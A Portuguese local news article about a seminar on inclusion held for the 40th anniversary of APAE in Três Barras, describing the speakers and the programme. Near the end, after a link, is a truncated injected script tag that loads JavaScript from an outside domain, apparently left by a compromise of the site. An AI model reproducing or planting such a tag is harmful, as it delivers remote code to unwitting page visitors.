InícioDestaqueSeminário pelos 40 anos da APAE reúne profissionais que atuam na educação...

Seminário pelos 40 anos da APAE reúne profissionais que atuam na educação especial

Últimas notícias

Em ação rápida policias recuperam veículo roubado em Canoinhas

Nesta quinta-feira, 20, a Polícia Militar foi  acionada para...

Mulher vítima de violência doméstica aciona a PM através do botão do pânico

Na manhã desta quinta-feira, 20, uma mulher vítima de...

 

“Inclusão, porque não” foi o tema central do Seminário que celebrou os 40 anos de instalação da Associação de Pais e Amigos dos Excepcionais (APAE) em Três Barras.

Público superior a 70 pessoas, entre membros da equipe técnica da entidade e profissionais das redes municipal, estadual e particular de ensino que trabalham com educação especial, participaram da atividade que aconteceu durante a manhã e tarde de quarta-feira (29), no auditório das secretarias de Educação e Saúde.

Monitores, segundos professores e educadores das séries iniciais que estão em contato direto com os 76 alunos especiais em creches e escolas municipais acompanharam as discussões sobre o assunto.

Há 21 anos na direção geral da APAE, Denise de Souza disse que a missão da entidade é promover a inclusão da pessoa especial na própria família e na sociedade, garantindo-lhe também o direito de ir e vir. “Nós defendemos pessoas, tratando o direito de todas com igualdade”, enfatizou, durante a abertura do evento.

Especializada no atendimento de pessoas com deficiência intelectual e múltipla, a APAE de Três Barras possui atualmente 35 funcionários, entre profissionais do setor administrativo, de serviços gerais e motoristas, além de técnicos especializados, pedagogos e monitores.

Fora a direção composta por voluntários, empresas locais, comunidade e esferas governamentais auxiliam na manutenção da entidade. O Governo de Três Barras, por meio da secretaria de Educação, Cultura e Esporte, é um dos parceiros com a cessão de professores e transporte escolar para os alunos.

Representando a administração municipal na solenidade, secretário de Educação, Antônio Tsunoda, destacou a iniciativa da APAE em debater o tema com os profissionais que, no dia a dia, convivem com crianças e adolescentes especiais. “A inclusão é, acima de tudo, uma ação humanitária”, avaliou, ao também dizer que “todo tipo de rejeição deve ser enfrentada, começando pelas escolas”.

Ainda durante a abertura, o aluno Emerson Demétrio fez uma apresentação de dança com uma boneca de pano. Autoridades militares acompanharam a solenidade.

 

Programação

Pela manhã, grande parte do evento foi dedicado à palestra “Os direitos de pessoas com deficiência e a APAE”, ministrada por Maria Luiza Milani, Doutora em Serviço Social, Políticas e Movimentos Sociais e docente no curso de Mestrado em Desenvolvimento Regional da Universidade do Contestado (UnC), de Canoinhas.

A fim de apresentar os serviços oferecidos pela entidade, a equipe técnica da APAE ocupou o período vespertino para trazer informações sobre currículo funcional, educação profissional, fisioterapia neurofuncional, terapia ocupacional, avaliação e atendimento clínico, principais direitos das pessoas com deficiência, autismo e inclusão.

O seminário foi finalizado com o repasse de orientações inerentes as atividades à distância, nas quais as profissionais terão que desenvolver, nas próprias unidades escolares, uma ação cultural que aborde o tema inclusão.

As apresentações devem acontecer em outro evento a ser agendado pela direção da APAE. Haverá premiação aos melhores trabalhos e a entrega de certificados a todos os participantes.

Para mais informações, acesse: www.tresbarras.sc.gov.br/noticias… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.